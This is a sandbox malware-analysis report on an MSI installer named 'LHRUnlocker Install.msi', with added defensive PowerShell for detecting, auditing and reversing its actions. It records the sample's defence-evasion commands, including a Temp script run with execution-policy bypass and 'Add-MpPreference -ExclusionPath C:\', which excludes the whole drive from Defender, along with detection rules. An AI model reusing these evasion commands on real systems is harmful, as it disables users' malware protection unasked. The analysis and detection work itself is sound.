Windows Analysis Report
LHRUnlocker Install.msi

Overview

General Information

Sample Name: LHRUnlocker Install.msi
Analysis ID: 577501
MD5: ca17c1bbedc959ad89f1c1dbf6b7aa32
SHA1: d24658face1f6fd3b457d7250c9b1a630798678d
SHA256: 8fb46d2d56dd411ad10862204849abf9a4546f1ab1d40bcb6b0cac284debc055

Detection

Score: 45
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Suspicious Script Execution From Temp Folder
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Powershell Defender Exclusion
Adds a directory exclusion to Windows Defender
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • msiexec.exe (PID: 4348 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3744 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 4884 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6736 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 7036 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup
No configs have been found
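The process tree above is the whole story of this sample in three hops: the Windows Installer service instance (msiexec.exe /V, PID 3744) hands a custom action to a 32-bit MsiExec.exe -Embedding host (PID 6736), that host runs a PowerShell launcher script out of the user's Temp directory with -ExecutionPolicy Bypass (PID 7036), and that script spawns a second PowerShell (PID 6712) that runs Add-MpPreference -ExclusionPath C:\, which excludes the entire system drive from Windows Defender scanning. The following PowerShell is an added example, not part of the Joe Sandbox report: it replays the three command lines as hand-built process-creation records (field names follow Sysmon Event ID 1 / Security 4688 naming, but the records are constructed here, not real log output) and applies checks that mirror the Sigma hits listed above.

```powershell
# Added example (not from the report): process-creation checks for the pattern this
# sample shows. Feed it real Sysmon EID 1 / Security 4688 records with the same
# property names; the $sample records below are constructed from the report's tree.

function Test-TempScriptWithBypass {
    param([Parameter(Mandatory)][string]$CommandLine)
    # A .ps1 launched from a Temp directory while the execution policy is bypassed.
    $fromTemp = $CommandLine -match '(?i)\\AppData\\Local\\Temp\\[^"\s]+\.ps1'
    $bypass   = $CommandLine -match '(?i)-ExecutionPolicy\s+(Bypass|Unrestricted)'
    return ($fromTemp -and $bypass)
}

function Test-BroadDefenderExclusion {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Add-/Set-MpPreference whose -ExclusionPath is a bare drive root such as C:\ or C:
    if ($CommandLine -notmatch '(?i)(Add|Set)-MpPreference') { return $false }
    return ($CommandLine -match '(?i)-ExclusionPath\s+"?[A-Za-z]:\\?"?(\s|$)')
}

function Find-SuspiciousProcessEvents {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $reasons = @()
        if (Test-TempScriptWithBypass $e.CommandLine)  { $reasons += 'ps1 from Temp with -ExecutionPolicy Bypass' }
        if (Test-BroadDefenderExclusion $e.CommandLine) { $reasons += 'whole-drive Defender exclusion' }
        if ($e.ParentImage -match '(?i)\\msiexec\.exe$' -and $e.Image -match '(?i)\\powershell\.exe$') {
            $reasons += 'powershell spawned by msiexec (MSI custom action)'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                ProcessId       = $e.ProcessId
                ParentProcessId = $e.ParentProcessId
                Image           = $e.Image
                Reasons         = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records copied from the process tree in this report.
$sample = @(
    [pscustomobject]@{ ProcessId = 6736; ParentProcessId = 3744
        Image = 'C:\Windows\SysWOW64\msiexec.exe'; ParentImage = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4' }
    [pscustomobject]@{ ProcessId = 7036; ParentProcessId = 6736
        Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\SysWOW64\msiexec.exe'
        CommandLine = '-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt"' }
    [pscustomobject]@{ ProcessId = 6712; ParentProcessId = 7036
        Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\' }
)

# PID 7036 is flagged twice (Temp script + msiexec parent), PID 6712 once (exclusion), PID 6736 not at all.
Find-SuspiciousProcessEvents -Events $sample | Format-Table -AutoSize
```

Security 4688 only carries the command line when "Include command line in process creation events" is enabled, so without that policy or Sysmon the first two checks have nothing to match on; PowerShell script-block logging (event 4104) would additionally capture the contents of the launcher script and of scr3351.ps1, which the command line alone does not reveal.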
Source: Process Memory Space: powershell.exe PID: 7036
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0xbd9b:$sa2: -encodedCommand
  • 0xbdc7:$sa2: -encodedCommand
  • 0xc4ac:$sa2: -EncodedCommand
  • 0xcfb6:$sa2: -EncodedCommand
  • 0xd051:$sa2: -encodedCommand
  • 0x11e5:$sc2: -NoProfile
  • 0x48a3:$sc2: -NoProfile
  • 0x684d:$sc2: -NoProfile
  • 0x286cc:$sc2: -NoProfile
  • 0x316ce:$sc2: -NoProfile
  • 0x3181e:$sc2: -NoProfile
  • 0x31c90:$sc2: -NoProfile
  • 0x32004:$sc2: -NoProfile
  • 0x32289:$sc2: -NoProfile
  • 0x32607:$sc2: -NoProfile
  • 0x3c815:$sc2: -NoProfile
  • 0x7b6f6:$sc2: -NoProfile
  • 0x7b846:$sc2: -NoProfile
  • 0x7c19f:$sc2: -NoProfile
  • 0x7c503:$sc2: -NoProfile
  • 0x7cbcd:$sc2: -NoProfile

System Summary

Source: Process started
Author: Florian Roth, Max Altgelt
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036

Source: Process started
Author: frack113
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036

Source: Process started
Author: Florian Roth
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, ProcessId: 6712

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036

Source: Pipe created
Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Data: PipeName: \PSHost.132901445801825560.7036.DefaultAppDomain.powershell
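If a host has run this installer, the first thing to undo is the exclusion: with C:\ excluded, Defender will not scan anything the package drops afterwards. The following PowerShell is an added example, not from the report, that audits the local Defender configuration for whole-drive path exclusions, lists the Defender configuration-change events that record when they were added (event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log), and removes them when -Remediate is given. It must run from an elevated prompt; the seven-day look-back and the Temp scan path are assumptions.

```powershell
# Added example (not from the report): Defender exclusion triage for a host that
# may have run this MSI. Run from an elevated PowerShell prompt.

function Get-BroadDefenderExclusion {
    # Returns exclusion paths that cover a drive root ('C:\' or 'C:'); such an
    # exclusion turns off real-time scanning for everything on that volume.
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath | Where-Object { $_ })) {
        if ($p -match '^[A-Za-z]:\\?$') {
            [pscustomobject]@{ Kind = 'ExclusionPath'; Value = $p }
        }
    }
}

function Get-DefenderExclusionChangeEvent {
    param([datetime]$Since = (Get-Date).AddDays(-7))   # assumption: one-week window
    # Event 5007 records Defender configuration changes; its message names the
    # registry value that changed, e.g. ...\Exclusions\Paths\C:\ = 0x0
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = $Since
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions\\Paths' } |
        Select-Object TimeCreated, Message
}

function Invoke-DefenderExclusionTriage {
    param([switch]$Remediate)
    $broad = @(Get-BroadDefenderExclusion)
    if ($broad.Count -eq 0) {
        Write-Output 'No whole-drive Defender exclusions present.'
    } else {
        Write-Output 'Whole-drive exclusions:'
        $broad | Format-Table -AutoSize | Out-String | Write-Output
    }
    Write-Output 'Exclusion changes recorded by Defender (event 5007):'
    Get-DefenderExclusionChangeEvent | Format-List | Out-String | Write-Output

    if ($Remediate -and $broad.Count -gt 0) {
        foreach ($b in $broad) {
            # Refused when Tamper Protection guards exclusions; in that case the
            # change has to go through the management console instead.
            Remove-MpPreference -ExclusionPath $b.Value
            Write-Output "Removed exclusion: $($b.Value)"
        }
        # Re-scan the directory the report shows the launcher script and the
        # custom-action DLLs were dropped into (assumption: same user profile).
        Start-MpScan -ScanType CustomScan -ScanPath (Join-Path $env:LOCALAPPDATA 'Temp')
    }
}

Invoke-DefenderExclusionTriage              # audit only
# Invoke-DefenderExclusionTriage -Remediate # audit, then remove and re-scan
```

Add-MpPreference needs administrator rights, which a per-machine MSI install already holds by the time its custom actions run, so nothing prompts the user separately for the Defender change; the 5007 event is the only local record of it unless the host also logs PowerShell script blocks or process command lines.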

Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb> source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdbj source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb` source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
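The .pdb paths above (AICustAct, PowerShellScriptLauncher, SoftwareDetector, FileOperations and ShortcutFlags under C:\JobRelease\win\Release\custact\x86\) belong to the stock custom-action DLLs that Advanced Installer embeds in the packages it builds, which fits the https://www.advancedinstaller.com string and the AI_* property names found elsewhere in this report. What such a package actually does is decided by its CustomAction table, and that table can be read without installing anything. The following PowerShell is an added example (not from the report and not Advanced Installer's code) that lists an MSI's custom actions and Binary-table streams through the WindowsInstaller.Installer COM API; the path is an assumption (the cached copy this report shows msiexec writing to C:\Windows\Installer\3c1a5a.msi), and the bit decodes in the comments follow the documented layout of the Type column.

```powershell
# Added example (not from the report): read an MSI's CustomAction and Binary tables
# without running it. Needs only msi.dll, present on every Windows host.

function Invoke-MsiQuery {
    param([Parameter(Mandatory)][string]$MsiPath,
          [Parameter(Mandatory)][string]$Sql,
          [Parameter(Mandatory)][int]$Columns)
    # Late-bound COM calls through InvokeMember; OpenDatabase mode 0 = read-only.
    $installer = New-Object -ComObject WindowsInstaller.Installer
    $db   = $installer.GetType().InvokeMember('OpenDatabase', 'InvokeMethod', $null, $installer, @($MsiPath, 0))
    $view = $db.GetType().InvokeMember('OpenView', 'InvokeMethod', $null, $db, @($Sql))
    $null = $view.GetType().InvokeMember('Execute', 'InvokeMethod', $null, $view, $null)
    while ($true) {
        $rec = $view.GetType().InvokeMember('Fetch', 'InvokeMethod', $null, $view, $null)
        if ($null -eq $rec) { break }
        # Record.StringData is 1-based; emit each row as one string array.
        ,@(1..$Columns | ForEach-Object {
            [string]$rec.GetType().InvokeMember('StringData', 'GetProperty', $null, $rec, @($_))
        })
    }
    $null = $view.GetType().InvokeMember('Close', 'InvokeMethod', $null, $view, $null)
}

function Get-MsiCustomAction {
    param([Parameter(Mandatory)][string]$MsiPath)
    foreach ($row in Invoke-MsiQuery -MsiPath $MsiPath -Sql 'SELECT Action, Type, Source, Target FROM CustomAction' -Columns 4) {
        $type = [int]$row[1]
        # Low 3 bits: what runs. Bits 0x30: where it comes from (0 = a Binary-table stream shipped inside the MSI).
        $kind = switch ($type -band 0x7) { 1 {'DLL'} 2 {'EXE'} 3 {'TextData'} 5 {'JScript'} 6 {'VBScript'} default {'Other'} }
        [pscustomobject]@{
            Action          = $row[0]
            Type            = $type
            Kind            = $kind
            FromBinaryTable = (($type -band 0x30) -eq 0)
            Deferred        = [bool]($type -band 0x400)
            # Deferred + NoImpersonate (0x800) runs as LocalSystem inside the installer service.
            NoImpersonate   = [bool]($type -band 0x800)
            Source          = $row[2]
            Target          = $row[3]
        }
    }
}

function Get-MsiBinaryName {
    param([Parameter(Mandatory)][string]$MsiPath)
    Invoke-MsiQuery -MsiPath $MsiPath -Sql 'SELECT Name FROM Binary' -Columns 1 | ForEach-Object { $_[0] }
}

$MsiPath = 'C:\Windows\Installer\3c1a5a.msi'   # assumption: the cached copy named in this report

'Binary table streams (embedded custom-action code):'
Get-MsiBinaryName -MsiPath $MsiPath

'Custom actions that ship their own code, run without impersonation, or mention PowerShell:'
Get-MsiCustomAction -MsiPath $MsiPath |
    Where-Object { $_.FromBinaryTable -or ($_.Deferred -and $_.NoImpersonate) -or "$($_.Source) $($_.Target)" -match 'PowerShell' } |
    Format-Table Action, Kind, Deferred, NoImpersonate, Source, Target -AutoSize
```

A package whose Binary table carries a PowerShell launcher DLL and whose custom actions are deferred with NoImpersonate is exactly the shape this report describes: the script itself is not visible in the table, only the launcher, so the next step is to extract the Binary streams and the script resources and read them before anything is executed.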
Source: C:\Windows\System32\msiexec.exe File opened: a:, b:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: c:
(Windows Installer probes every drive letter during disk costing, so the drive-enumeration signature fires for any MSI and is not by itself an indicator for this sample.)
Strings found in binary or memory, grouped by source:

Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.dr (certificate-chain URLs from the Authenticode signature on the package and its custom-action DLLs, plus the Advanced Installer vendor URL)
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
  • http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
  • http://crl3.digicert.com/sha2-assured-ts.crl02
  • http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
  • http://crl4.digicert.com/sha2-assured-ts.crl0
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0O
  • http://t1.symcb.com/ThawtePCA.crl0
  • http://t2.symcb.com0
  • http://tl.symcb.com/tl.crl0
  • http://tl.symcb.com/tl.crt0
  • http://tl.symcd.com0&
  • http://www.digicert.com/CPS0
  • https://www.advancedinstaller.com
  • https://www.digicert.com/CPS0
  • https://www.thawte.com/cps0/
  • https://www.thawte.com/repository0W

Source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
  • http://www.winimage.com/zLibDll
  • http://www.winimage.com/zLibDll1.2.7rbr
  • https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interr

Source: 3c1a5a.msi.1.dr (installer UI strings; the Telegram URL is run together with neighbouring Property-table values)
  • https://t.me/LHRUnlockerChannelButtonText_Finish&FinishManufacturerSergeyProductCode
  • https://t.me/LHRUnlockerMSIFASTINSTALLAI_CURRENT_YEAR2022ButtonText_Decline&DeclineAI_PREDEF_LCONDS_

Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp
  • http://nuget.org/NuGet.exe
  • https://contoso.com/
  • https://contoso.com/Icon
  • https://contoso.com/License
  • https://nuget.org/nuget.exe

Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
  • http://pesterbdd.com/images/Pester.png
  • http://pesterbdd.com/images/Pester.png0
  • http://www.apache.org/licenses/LICENSE-2.0.html
  • http://www.apache.org/licenses/LICENSE-2.0.html0
  • https://github.com/Pester/Pester
  • https://github.com/Pester/Pester0

Source: powershell.exe, 00000008.00000003.527476361.00000000057BD000.00000004.00000800.00020000.00000000.sdmp
  • https://go.micro

Source: powershell.exe, 00000008.00000002.569706056.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569503503.0000000005321000.00000004.00000800.00020000.00000000.sdmp
  • http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: powershell.exe, 00000014.00000002.567216756.0000000003417000.00000004.00000020.00020000.00000000.sdmp
  • http://crl.globalsign.net/root-r2.crl0

Source: powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmp
  • http://schemas.xmlsoap.org/soap/encoding/
  • http://schemas.xmlsoap.org/wsdl/

(The Pester, NuGet, contoso.com and xmlsoap.org strings in the powershell.exe dumps come from module manifests and .NET assemblies of the stock PowerShell installation that get mapped into the process; they are not indicators for this sample. The only sample-specific network strings on this page are the sergeydev.com driver URL and the t.me channel links.)
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
(No -EncodedCommand appears in any command line recorded on this page; the $sa2 hits listed under the rule are strings in the process's memory, while the -NoProfile hits do match the launcher's command line.)
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI1FD8.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\3c1a5a.msi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00874080, 8_2_008755B8, 8_2_00873168, 8_2_00870B90, 8_2_008793B8, 8_2_00874BC8, 8_2_0087CB70, 8_2_00871428, 8_2_0087B6B0, 8_2_0087B6A0, 8_2_0087B6B0, 8_2_00887538, 20_2_035DB9B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenameviewer.exeF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenameShortcutFlags.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msi Binary or memory string: OriginalFilenameFileOperations.dllF vs LHRUnlocker Install.msi
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll (reported twice)
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll (reported twice)
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll (reported twice)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
